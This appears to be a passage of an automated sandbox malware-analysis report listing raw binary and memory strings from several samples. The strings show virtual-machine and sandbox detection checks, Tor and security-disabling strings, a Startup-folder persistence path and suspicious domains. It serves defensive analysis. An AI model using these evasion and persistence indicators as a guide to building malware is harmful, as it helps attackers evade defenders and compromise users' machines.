proxy.exepsapi.dllquestionsreboot inrecover: reflect: rwxrwxrwxscavtracestackpoolsucceededtask %+v
Source: 31839b57a4f11171d6abc8bbc4451ee4.exe	Binary or memory string: STAWSTAhomAtoiCDN=CESTChamDATADashDataDateEESTEULAEtagFromGOGCGoneHostJulyJuneLEAFLisuMiaoModiNZDTNZSTNameNewaPINGPOSTPathQEMUROOTSASTSTARSendStatTempThaiTypeUUID"%s"\rss\smb\u00 %+v m=] = ] n=allgallparchasn1avx2basebindbitsbmi1bmi2boolcallcap cas1cas2cas3ca
Source: 31839b57a4f11171d6abc8bbc4451ee4.exe	Binary or memory string: uint64unuseduptimevmhgfsvmxnetvpc-s3wup_hsxennetxensvcxenvdb %v=%v, (conn) (scan (scan) MB in Value> allocs dying= flags= len=%d locks= m->g0= nmsys= pad1= pad2= s=nil text= zombie$WINDIR% CPU (%03d %s%v: %#x, goid=, j0 = -nologo/delete19531252.5.4.32.5.
Source: 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2416198321.00000000029D5000.00000040.00000020.00020000.00000000.sdmp	Binary or memory string: ameNewaPINGPOSTPathQEMUROOTH
Source: 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2342467116.0000000000400000.00000040.00000001.01000000.0000000C.sdmp	Binary or memory string: too many linkstoo many userstorrc filenameunexpected EOFunknown code: unknown error unknown methodunknown mode: unreachable: unsafe.PointeruserArenaStatevirtualbox: %wvmwaretray.exevmwareuser.exewii libnup/1.0winapi error #window createdwork.full != 0xenservice.exezero parameter with GC prog
Source: 31839b57a4f11171d6abc8bbc4451ee4.exe	Binary or memory string: popcntrdtscpreadatreasonremoverenamereturnrun-v3rune1 secondselectsendtoserversocketsocks socks5statusstringstructsweep sysmontelnettimersuint16uint32uint64unuseduptimevmhgfsvmxnetvpc-s3wup_hsxennetxensvcxenvdb %v=%v, (conn) (scan (scan) MB in Value> allocs
Source: 31839b57a4f11171d6abc8bbc4451ee4.exe	Binary or memory string: sse41sse42ssse3sudogsweeptext/tls: torrctotaltraceuint8unameusageuser=utf-8valuevmusbvmx86write B -> Value addr= alloc base code= ctxt: curg= free goid jobs= list= m->p= max= min= next= p->m= prev= span=% util%s.exe%s.sys%s: %s(...) , i = , not , val -BE
Source: 31839b57a4f11171d6abc8bbc4451ee4.exe	Binary or memory string: LycianLydianMondayPADDEDPcaSvcPragmaRejangSCHED STREETServerStringSundaySyriacTai_LeTangutTeluguThaanaTypeMXTypeNSUTC+12UTC+13UTC-02UTC-08UTC-09UTC-11VBoxSFWINDIRWanchoWinMonWinmonX25519Yezidi[]byte\??\%s\csrss\ufffd acceptactivechan<-closedcookiedirectdo
Source: 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2342467116.0000000000400000.00000040.00000001.01000000.0000000C.sdmp	Binary or memory string: tracebackunderflowunhandleduninstallunzip Torunzip: %wurn:uuid:w3m/0.5.1wbufSpanswebsocketxenevtchn} stack=[ netGo = MB goal, flushGen for type gfreecnt= heapGoal= pages at ptrSize= runqsize= runqueue= s.base()= spinning= stopwait= stream=%d sweepgen sweepgen= targetpc= throwing= until pc=%!(NOVERB)%!Weekday(%s.uuid.%s%s\|%s%s\|%s(BADINDEX), bound = , limit = -noprofile-uninstall.localhost/dev/stdin/etc/hosts/show-eula12207031256103515625: parsing :authorityAdditionalBad varintCampaignIDCancelIoExChorasmianClassCHAOSClassCSNETConnectionContent-IdCreateFileCreatePipeDSA-SHA256DeprecatedDevanagariDnsQuery_WECDSA-SHA1END_STREAMERROR-CODEException GC forced
Source: 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2430493808.0000000003213000.00000040.00001000.00020000.00000000.sdmp	Binary or memory string: main.isRunningInsideVMWare
Source: dialer.exe, 00000022.00000003.2856446018.000001B8F60CB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: cvYQzoVj.exeqNMTWEVNNjozGDKXokccvYQzoVj.exeC:\Program Files (x86)\zRldtbaVCHHXnHJyftZOBzesBDzjDlWlCDCFlQkqeNfVJTNPArJoRxzWfMsJsmcUmoOaAMEPtJXBDaO\qNMTWEVNNjozGDKXokccvYQzoVj.exeqNMTWEVNNjozGDKXokccvYQzoVj.exeC:\Program Files (x86)\zRldtbaVCHHXnHJyftZOBzesBDzjDlWlCDCFlQkqeNfVJTNPArJoRxzWfMsJsmcUmoOaAMEPtJXBDaO\qNMTWEVNNjozGDKXokccvYQzoVj.exeqNMTWEVNNjozGDKXokccvYQzoVj.exeC:\Program Files (x86)\zRldtbaVCHHXnHJyftZOBzesBDzjDlWlCDCFlQkqeNfVJTNPArJoRxzWfMsJsmcUmoOaAMEPtJXBDaO\qNMTWEVNNjozGDKXokccvYQzoVj.exeqNMTWEVNNjozGDKXokccvYQzoVj.exeC:\Program Files (x86)\zRldtbaVCHHXnHJyftZOBzesBDzjDlWlCDCFlQkqeNfVJTNPArJoRxzWfMsJsmcUmoOaAMEPtJXBDaO\qNMTWEVNNjozGDKXokccvYQzoVj.exeqNMTWEVNNjozGDKXokccvYQzoVj.exeC:\Program Files (x86)\zRldtbaVCHHXnHJyftZOBzesBDzjDlWlCDCFlQkqeNfVJTNPArJoRxzWfMsJsmcUmoOaAMEPtJXBDaO\qNMTWEVNNjozGDKXokccvYQzoVj.exeqNMTWEVNNjozGDKXokccvYQzoVj.exeC:\Program Files (x86)\zRldtbaVCHHXnHJyftZOBzesBDzjDlWlCDCFlQkqeNfVJTNPArJoRxzWfMsJsmcUmoOaAMEPtJXBDaO\qNMTWEVNNjozGDKXokccvYQzoVj.exeqNMTWEVNNjozGDKXokccvYQzoVj.exeC:\Program Files (x86)\zRldtbaVCHHXnHJyftZOBzesBDzjDlWlCDCFlQkqeNfVJTNPArJoRxzWfMsJsmcUmoOaAMEPtJXBDaO\qNMTWEVNNjozGDKXokccvYQzoVj.exeqNMTWEVNNjozGDKXokccvYQzoVj.exeC:\Program Files (x86)\zRldtbaVCHHXnHJyftZOBzesBDzjDlWlCDCFlQkqeNfVJTNPArJoRxzWfMsJsmcUmoOaAMEPtJXBDaO\qNMTWEVNNjozGDKXokccvYQzoVj.exeqNMTWEVNNjozGDKXokccvYQzoVj.exeC:\Program Files (x86)\zRldtbaVCHHXnHJyftZOBzesBDzjDlWlCDCFlQkqeNfVJTNPArJoRxzWfMsJsmcUmoOaAMEPtJXBDaO\qNMTWEVNNjozGDKXokccvYQzoVj.exeqNMTWEVNNjozGDKXokccvYQzoVj.exeC:\Program Files (x86)\zRldtbaVCHHXnHJyftZOBzesBDzjDlWlCDCFlQkqeNfVJTNPArJoRxzWfMsJsmcUmoOaAMEPtJXBDaO\qNMTWEVNNjozGDKXokccvYQzoVj.exeqNMTWEVNNjozGDKXokccvYQzoVj.exeC:\Program Files (x86)\zRldtbaVCHHXnHJyftZOBzesBDzjDlWlCDCFlQkqeNfVJTNPArJoRxzWfMsJsmcUmoOaAMEPtJXBDaO\qNMTWEVNNjozGDKXokccvYQzoVj.exeRegSvcs.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeInstallSetup8.exeC:\Users\user\AppData\Local\Temp\InstallSetup8.exeBroomSetup.exeC:\Users\user\AppData\Local\Temp\BroomSetup.exetuc4.exeC:\Users\user\AppData\Local\Temp\tuc4.exetuc4.tmpC:\Users\user\AppData\Local\Temp\is-5MF81.tmp\tuc4.tmpetopt.exeC:\Users\user\AppData\Local\Temp\etopt.exetuc4.exeC:\Users\user\AppData\Local\Temp\tuc4.exetuc4.tmpC:\Users\user\AppData\Local\Temp\is-OKLT8.tmp\tuc4.tmpnsi4BEF.tmp.exeC:\Users\user\AppData\Local\Temp\nsi4BEF.tmp.exe5A58.exeC:\Users\user\AppData\Local\Temp\5A58.exedialer.exeC:\Windows\System32\dialer.exe7D14.exeC:\Users\user\AppData\Local\Temp\7D14.exe9234.exeC:\Users\user\AppData\Local\Temp\9234.exeA203.exeC:\Users\user\AppData\Local\Temp\A203.exeABF7.exeC:\Users\user\AppData\Local\Temp\ABF7.exevghrjtaC:\Users\user\AppData\Roaming\vghrjtaxQfUeydaBrjuHptx.exeC:\ProgramData\xQfUeydaBrjuHptx.exedatapumpcrt.exeC:\Program Files (x86)\DataPumpCRT\datapumpcrt.exeqemu-ga.exeC:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\qemu-ga.exeWmiPrvSE.exexQfUeydaBrjuHptx.exeC:\ProgramData\xQfUeydaBrjuHptx.exeWMIADAP.exeT
Source: 907.exe, 00000006.00000000.1906824742.0000000000DD1000.00000002.00000001.01000000.00000006.sdmp	Binary or memory string: G2ZXIHQEmuD8Q5Lub4sK
Source: 31839b57a4f11171d6abc8bbc4451ee4.exe	Binary or memory string: 4cas5cas6chandatedeaddialdoneermsetagethmfailfileflagfromftpsfuncgziphosthourhttpicmpidleigmpint8itabjsonkindlinkmdnsnullopenpathpipepop3quitreadrootsbrkseeksid=sizesmtpsse3tag:tcp4texttruetypeudp4uintunixuuidvaryvmcixn-- -%s (at ... MB, \" and got= max
Source: explorer.exe, 00000001.00000000.1676755416.0000000007A34000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWen-GBnx
Source: 31839b57a4f11171d6abc8bbc4451ee4.exe	Binary or memory string: 3-512SOFTWARESaturdaySetEventSystem32TagbanwaTai_ThamTai_VietThursdayTifinaghTypeAAAATypeAXFRUSERHASHUSERNAMEUgariticVBoxWddmWSAIoctlWinmonFSWmiPrvSE[::1]:53[:word:][signal \\.\HGFS\\.\vmcistack=[_NewEnum_gatewayacceptexaddress bad instcgocheckcontinuecs
Source: 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000003.2047877802.00000000036C0000.00000004.00001000.00020000.00000000.sdmp, 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2430493808.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp, 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2342467116.0000000000400000.00000040.00000001.01000000.0000000C.sdmp	Binary or memory string: 100-continue127.0.0.1:%d127.0.0.1:53152587890625762939453125AUTHENTICATEBidi_ControlCIDR addressCONTINUATIONCfgMgr32.dllCoCreateGuidCoInitializeContent TypeContent-TypeCookie.ValueCreateEventWCreateMutexWDeleteObjectECDSA-SHA256ECDSA-SHA384ECDSA-SHA512ErrUnknownPCFindNextFileGetAddrInfoWGetConsoleCPGetLastErrorGetLengthSidGetProcessIdGetStdHandleGetTempPathWGetUserGeoIDGlobalUnlockGlobal\csrssI'm a teapotInstAltMatchJoin_ControlLittleEndianLoadLibraryWLoadResourceLockResourceMax-ForwardsMeetei_MayekMime-VersionMulti-StatusNot ExtendedNot ModifiedNtCreateFileOpenServiceWPUSH_PROMISEPahawh_HmongRCodeRefusedRCodeSuccessReadConsoleWReleaseMutexReportEventWResumeThreadRevertToSelfRoInitializeS-1-5-32-544SERIALNUMBERSelectObjectServer ErrorSetEndOfFileSetErrorModeSetStdHandleSora_SompengSyloti_NagriSysStringLenThread32NextTor mode setTransmitFileUnauthorizedUnlockFileExVBoxTray.exeVariantClearVirtualAllocVirtualQueryWinmon32.sysWinmon64.sysWintrust.dllX-ImforwardsX-Powered-By[[:^ascii:]]\/(\d+)-(.*)\\.\WinMonFSabi mismatchadvapi32.dllaltmatch -> anynotnl -> bad flushGenbad g statusbad g0 stackbad recoverybad value %dbootmgfw.efibuild_numberc ap trafficc hs trafficcaller errorcan't happencas64 failedcdn is emptychan receiveclose notifycontent-typecontext.TODOcountry_codedse disableddumping heapend tracegc
Source: explorer.exe, 00000001.00000000.1678877652.00000000098A8000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: k&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
Source: 31839b57a4f11171d6abc8bbc4451ee4.exe	Binary or memory string: yreleasep: m=remote errorremoving appruntime: gp=runtime: sp=s ap traffics hs trafficself-preemptsetupapi.dllshort bufferspanSetSpinesweepWaiterstraceStringstraffic/readtransmitfileulrichard.chunexpected )unknown portunknown typevmacthlp.exevmtoolsd.exewatchdo
Source: explorer.exe, 00000001.00000000.1675217298.0000000001240000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&0000000}
Source: explorer.exe, 00000001.00000000.1676755416.00000000079FB000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2342467116.0000000000400000.00000040.00000001.01000000.0000000C.sdmp	Binary or memory string: GetActiveObjectGetAdaptersInfoGetCommTimeoutsGetCommandLineWGetFirmwareTypeGetProcessTimesGetSecurityInfoGetStartupInfoWGlobal\qtxp9g8wHanifi_RohingyaICE-CONTROLLINGIdempotency-KeyImpersonateSelfInstall failureIsWindowUnicodeIsWindowVisibleIsWow64Process2Length RequiredLoadLibraryExALoadLibraryExWNot ImplementedNtSuspendThreadOpenThreadTokenOther_LowercaseOther_UppercasePKCS1WithSHA256PKCS1WithSHA384PKCS1WithSHA512Partial ContentPostQuitMessageProcess32FirstWPsalter_PahlaviQueryDosDeviceWRegCreateKeyExWRegDeleteValueWRequest TimeoutRtlDefaultNpAclSafeArrayCreateSafeArrayGetDimSafeArrayGetIIDSafeArrayUnlockScheduledUpdateSetCommTimeoutsSetSecurityInfoSetVolumeLabelWShellExecuteExWStringFromCLSIDStringFromGUID2TerminateThreadUnescaped quoteUninstallStringUnmapViewOfFileVBoxService.exeVPS.hsmiths.comWinsta0\DefaultX-Forwarded-For\\.\VBoxTrayIPC]
Source: dialer.exe, 00000022.00000003.2605499058.000001B8F60BE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}SymbolicLinkLinkcLinkSymbolicLink
Source: 31839b57a4f11171d6abc8bbc4451ee4.exe	Binary or memory string: sse42ssse3sudogsweeptext/tls: torrctotaltraceuint8unameusageuser=utf-8valuevmusbvmx86write B -> Value addr= alloc base code= ctxt: curg= free goid jobs= list= m->p= max= min= next= p->m= prev= span=% util%s.exe%s.sys%s: %s(...) , i = , not , val -BEFV--D
Source: 31839b57a4f11171d6abc8bbc4451ee4.exe	Binary or memory string: eUnprocessable EntityWinmonProcessMonitor\\.\pipe\VBoxTrayIPC^.*\._Ctype_uint8_t$asn1: syntax error: assigned stream ID 0bad font file formatbad system page sizebad use of bucket.bpbad use of bucket.mpcertificate requiredchan send (nil chan)close of nil channe
Source: 31839b57a4f11171d6abc8bbc4451ee4.exe	Binary or memory string: potency-Key\System32\drivers\\.\VBoxMiniRdrDN os/exec.Command(^.*\._Ctype_char$bad TinySizeClasscouldn't dial: %wcouldn't find pidcouldn't get UUIDcouldn't get pidscouldn't hide PIDcpu name is emptycreate window: %wdecode server: %wdecryption faileddownload fi
Source: dialer.exe, 00000022.00000003.2677582742.000001B8F60DC000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: C:\Program Files (x86)\zRldtbaVCHHXnHJyftZOBzesBDzjDlWlCDCFlQkqeNfVJTNPArJoRxzWfMsJsmcUmoOaAMEPtJXBDaO\qNMTWEVNNjozGDKXokccvYQzoVj.exeqNMTWEVNNjozGDKXokccvYQzoVj.exeC:\Program Files (x86)\zRldtbaVCHHXnHJyftZOBzesBDzjDlWlCDCFlQkqeNfVJTNPArJoRxzWfMsJsmcUmoOaAMEPtJXBDaO\qNMTWEVNNjozGDKXokccvYQzoVj.exeqNMTWEVNNjozGDKXokccvYQzoVj.exeC:\Program Files (x86)\zRldtbaVCHHXnHJyftZOBzesBDzjDlWlCDCFlQkqeNfVJTNPArJoRxzWfMsJsmcUmoOaAMEPtJXBDaO\qNMTWEVNNjozGDKXokccvYQzoVj.exeqNMTWEVNNjozGDKXokccvYQzoVj.exeC:\Program Files (x86)\zRldtbaVCHHXnHJyftZOBzesBDzjDlWlCDCFlQkqeNfVJTNPArJoRxzWfMsJsmcUmoOaAMEPtJXBDaO\qNMTWEVNNjozGDKXokccvYQzoVj.exeqNMTWEVNNjozGDKXokccvYQzoVj.exeC:\Program Files (x86)\zRldtbaVCHHXnHJyftZOBzesBDzjDlWlCDCFlQkqeNfVJTNPArJoRxzWfMsJsmcUmoOaAMEPtJXBDaO\qNMTWEVNNjozGDKXokccvYQzoVj.exeqNMTWEVNNjozGDKXokccvYQzoVj.exeC:\Program Files (x86)\zRldtbaVCHHXnHJyftZOBzesBDzjDlWlCDCFlQkqeNfVJTNPArJoRxzWfMsJsmcUmoOaAMEPtJXBDaO\qNMTWEVNNjozGDKXokccvYQzoVj.exeqNMTWEVNNjozGDKXokccvYQzoVj.exeC:\Program Files (x86)\zRldtbaVCHHXnHJyftZOBzesBDzjDlWlCDCFlQkqeNfVJTNPArJoRxzWfMsJsmcUmoOaAMEPtJXBDaO\qNMTWEVNNjozGDKXokccvYQzoVj.exeqNMTWEVNNjozGDKXokccvYQzoVj.exeC:\Program Files (x86)\zRldtbaVCHHXnHJyftZOBzesBDzjDlWlCDCFlQkqeNfVJTNPArJoRxzWfMsJsmcUmoOaAMEPtJXBDaO\qNMTWEVNNjozGDKXokccvYQzoVj.exeqNMTWEVNNjozGDKXokccvYQzoVj.exeC:\Program Files (x86)\zRldtbaVCHHXnHJyftZOBzesBDzjDlWlCDCFlQkqeNfVJTNPArJoRxzWfMsJsmcUmoOaAMEPtJXBDaO\qNMTWEVNNjozGDKXokccvYQzoVj.exeqNMTWEVNNjozGDKXokccvYQzoVj.exeC:\Program Files (x86)\zRldtbaVCHHXnHJyftZOBzesBDzjDlWlCDCFlQkqeNfVJTNPArJoRxzWfMsJsmcUmoOaAMEPtJXBDaO\qNMTWEVNNjozGDKXokccvYQzoVj.exeqNMTWEVNNjozGDKXokccvYQzoVj.exeC:\Program Files (x86)\zRldtbaVCHHXnHJyftZOBzesBDzjDlWlCDCFlQkqeNfVJTNPArJoRxzWfMsJsmcUmoOaAMEPtJXBDaO\qNMTWEVNNjozGDKXokccvYQzoVj.exeqNMTWEVNNjozGDKXokccvYQzoVj.exeC:\Program Files (x86)\zRldtbaVCHHXnHJyftZOBzesBDzjDlWlCDCFlQkqeNfVJTNPArJoRxzWfMsJsmcUmoOaAMEPtJXBDaO\qNMTWEVNNjozGDKXokccvYQzoVj.exeqNMTWEVNNjozGDKXokccvYQzoVj.exeC:\Program Files (x86)\zRldtbaVCHHXnHJyftZOBzesBDzjDlWlCDCFlQkqeNfVJTNPArJoRxzWfMsJsmcUmoOaAMEPtJXBDaO\qNMTWEVNNjozGDKXokccvYQzoVj.exeqNMTWEVNNjozGDKXokccvYQzoVj.exeC:\Program Files (x86)\zRldtbaVCHHXnHJyftZOBzesBDzjDlWlCDCFlQkqeNfVJTNPArJoRxzWfMsJsmcUmoOaAMEPtJXBDaO\qNMTWEVNNjozGDKXokccvYQzoVj.exeqNMTWEVNNjozGDKXokccvYQzoVj.exeC:\Program Files (x86)\zRldtbaVCHHXnHJyftZOBzesBDzjDlWlCDCFlQkqeNfVJTNPArJoRxzWfMsJsmcUmoOaAMEPtJXBDaO\qNMTWEVNNjozGDKXokccvYQzoVj.exeqNMTWEVNNjozGDKXokccvYQzoVj.exeC:\Program Files (x86)\zRldtbaVCHHXnHJyftZOBzesBDzjDlWlCDCFlQkqeNfVJTNPArJoRxzWfMsJsmcUmoOaAMEPtJXBDaO\qNMTWEVNNjozGDKXokccvYQzoVj.exeRegSvcs.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeInstallSetup8.exeC:\Users\user\AppData\Local\Temp\InstallSetup8.exeBroomSetup.exeC:\Users\user\AppData\Local\Temp\BroomSetup.exetuc4.exeC:\Users\user\AppData\Local\Temp\tuc4.exetuc4.tmpC:\Users\user\AppData\Local\Temp\is-5MF81.tmp\tuc4.tmpetopt.exeC:\Users\user\AppData\Local\Temp\etopt.exetuc4.exeC:\Users\user\AppDa
Source: 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2416198321.00000000029D5000.00000040.00000020.00020000.00000000.sdmp	Binary or memory string: vmhgfsP
Source: tuc4.tmp, 00000018.00000002.3181148622.000000000060E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\y
Source: dialer.exe, 00000022.00000003.2750963859.000001B8F60D3000.00000004.00000020.00020000.00000000.sdmp, dialer.exe, 00000022.00000003.2704944546.000001B8F60CE000.00000004.00000020.00020000.00000000.sdmp, dialer.exe, 00000022.00000003.2700493104.000001B8F60CB000.00000004.00000020.00020000.00000000.sdmp, dialer.exe, 00000022.00000003.2723023170.000001B8F60D3000.00000004.00000020.00020000.00000000.sdmp, dialer.exe, 00000022.00000003.2856446018.000001B8F60CB000.00000004.00000020.00020000.00000000.sdmp, dialer.exe, 00000022.00000003.2713011554.000001B8F60CB000.00000004.00000020.00020000.00000000.sdmp, dialer.exe, 00000022.00000003.2677582742.000001B8F60DC000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\qemu-ga.exe
Source: dialer.exe, 00000022.00000003.2605499058.000001B8F60BE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}SymbolicLinkmbolicLinkSymbolicLink/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
Source: dialer.exe, 00000022.00000003.2621843382.000001B8F6080000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}SymbolicLinkymbolicLinkcLinkSymbolicLink&
Source: etopt.exe, 0000001A.00000002.2798326413.0000000004F30000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: .?AVCMacGetCallback@?1??IsRunningInVmwareByMacID@GMoonLib@@YA_NXZ@
Source: 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2342467116.0000000000400000.00000040.00000001.01000000.0000000C.sdmp	Binary or memory string: Not ImplementedNtSuspendThreadOpenThreadTokenOther_LowercaseOther_UppercasePKCS1WithSHA256PKCS1WithSHA384PKCS1WithSHA512Partial ContentPostQuitMessageProcess32FirstWPsalter_PahlaviQueryDosDeviceWRegCreateKeyExWRegDeleteValueWRequest TimeoutRtlDefaultNpAclSafeArrayCreateSafeArrayGetDimSafeArrayGetIIDSafeArrayUnlockScheduledUpdateSetCommTimeoutsSetSecurityInfoSetVolumeLabelWShellExecuteExWStringFromCLSIDStringFromGUID2TerminateThreadUnescaped quoteUninstallStringUnmapViewOfFileVBoxService.exeVPS.hsmiths.comWinsta0\DefaultX-Forwarded-For\\.\VBoxTrayIPC]
Source: 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2342467116.0000000000400000.00000040.00000001.01000000.0000000C.sdmp	Binary or memory string: VirtualUnlockWINDOW_UPDATEWTSFreeMemoryWriteConsoleW[FrameHeader \\.\VBoxGuestaccept-rangesaccess deniedadvapi32.dllauthorizationbad flushGen bad map statebtc.cihar.combtc.xskyx.netcache-controlcontent-rangecouldn't polldalTLDpSugct?data is emptydouble unlockemail addressempty integerexchange fullfatal error: gethostbynamegetservbynamegzip, deflateif-none-matchignoring fileimage/svg+xmlinvalid ASN.1invalid UTF-8invalid base kernel32.dllkey expansionlame referrallast-modifiedlevel 3 resetload64 failedmaster secretmin too largename is emptynil stackbasenot a Float32open file: %wout of memoryparallels: %wparsing time powrprof.dllprl_tools.exeprofMemActiveprofMemFutureread EULA: %wrebooting nowruntime: seq=runtime: val=service stateset event: %wsigner is nilsocks connectsrmount errortimer expiredtraceStackTabtrailing dataunimplementedunsupported: user canceledvalue method virtualpc: %wxadd64 failedxchg64 failed}
Source: 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2342467116.0000000000400000.00000040.00000001.01000000.0000000C.sdmp	Binary or memory string: unixpacketunknown pcuser-agentuser32.dllvmusbmousevmware: %wws2_32.dll of size (targetpc= , plugin: ErrCode=%v KiB work, bytes ...
Source: 31839b57a4f11171d6abc8bbc4451ee4.exe	Binary or memory string: ssse3sudogsweeptext/tls: torrctotaltraceuint8unameusageuser=utf-8valuevmusbvmx86write B -> Value addr= alloc base code= ctxt: curg= free goid jobs= list= m->p= max= min= next= p->m= prev= span=% util%s.exe%s.sys%s: %s(...) , i = , not , val -BEFV--DYOR--
Source: 31839b57a4f11171d6abc8bbc4451ee4.exe	Binary or memory string: bmi1bmi2boolcallcap cas1cas2cas3cas4cas5cas6chandatedeaddialdoneermsetagethmfailfileflagfromftpsfuncgziphosthourhttpicmpidleigmpint8itabjsonkindlinkmdnsnullopenpathpipepop3quitreadrootsbrkseeksid=sizesmtpsse3tag:tcp4texttruetypeudp4uintunixuuidvaryvmcixn-- -%
Source: 31839b57a4f11171d6abc8bbc4451ee4.exe	Binary or memory string: ultX-Forwarded-For\\.\VBoxTrayIPC] morebuf={pc:accept-encodingaccept-languageadvertise erroragent is closedapplication/pdfasyncpreemptoffbad certificatebad trailer keybefore EfiGuardclass registredclient finishedcouldn't set AVcouldn't set sbdecode hash: %wdo
Source: 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2342467116.0000000000400000.00000040.00000001.01000000.0000000C.sdmp	Binary or memory string: VersionVirtualWSARecvWSASend"%s" %stypes value=abortedalt -> answersany -> booleancharsetchunkedcmd.execonnectconsolecpu: %scpuprofderiveddriversexpiresfloat32float64forcegcgctracehead = http://invalidlog.txtlookup messageminpc= nil keynop -> number pacer: panic: readdirrefererrefreshrequestrunningserial:server=signal svc_versyscalltor.exetraileruintptrunknownupgradeversionvmmousevpcuhubwaitingwindowswsarecvwsasendwup_verxen: %wxennet6 bytes, data=%q etypes incr=%v is not maxpc= mcount= minLC= minutes nalloc= newval= nfreed= ping=%q pointer stack=[ status %!Month(%02d%02d%s %s:%d%s: 0x%x-cleanup2.5.4.102.5.4.112.5.4.1748828125?4#?'1#0AcceptExAcceptedAllocateAltitudeArmenianBAD RANKBalineseBopomofoBugineseCancelIoCherokeeClassANYConflictContinueCurveID(CyrillicDNS nameDSA-SHA1DecemberDefenderDeleteDCDuployanEULA.txtEqualSidEthiopicExtenderFebruaryFirewallFullPathGeorgianGetOEMCPGoStringGujaratiGurmukhiHTTP/1.1HTTP/2.0HiraganaInstFailInstRuneIsWindowJavaneseKatakanaKayah_LiLIFETIMELinear_ALinear_BLocationLsaCloseMD5+SHA1MahajaniNO_ERRORNO_PROXYNovemberOl_ChikiPRIORITYPROGRESSParseIntPersoconPhags_PaQuestionReadFileReceivedSETTINGSSHA1-RSASHA3-224SHA3-256SHA3-384SHA3-512SOFTWARESaturdaySetEventSystem32TagbanwaTai_ThamTai_VietThursdayTifinaghTypeAAAATypeAXFRUSERHASHUSERNAMEUgariticVBoxWddmWSAIoctlWinmonFSWmiPrvSE[::1]:53[:word:][signal \\.\HGFS\\.\vmcistack=[_NewEnum_gatewayacceptexaddress bad instcgocheckcontinuecs deadlockdefault:dial: %wdnsquerydurationeax ebp ebx ecx edi edx eflags eip embeddedesi esp execwaitexporterf is nilfinishedfs gs hijackedhttp/1.1https://if-matchif-rangeinfinityinjectorinvalid linkpathlocationmac_addrmountvolmsvmmoufno anodeno-cacheno_proxypollDescreadfromrecvfromreflect.runnableruntime.rwmutexRrwmutexWscavengeshutdownstrconv.taskkilltor_modetraceBuftrigger=unixgramunknown(usernamevmmemctlvmx_svgawalk: %wwsaioctlwuauservx509sha1yuio.top (forced) B exp.) B work ( blocked= in use)
Source: 31839b57a4f11171d6abc8bbc4451ee4.exe	Binary or memory string: bmi2boolcallcap cas1cas2cas3cas4cas5cas6chandatedeaddialdoneermsetagethmfailfileflagfromftpsfuncgziphosthourhttpicmpidleigmpint8itabjsonkindlinkmdnsnullopenpathpipepop3quitreadrootsbrkseeksid=sizesmtpsse3tag:tcp4texttruetypeudp4uintunixuuidvaryvmcixn-- -%s (a
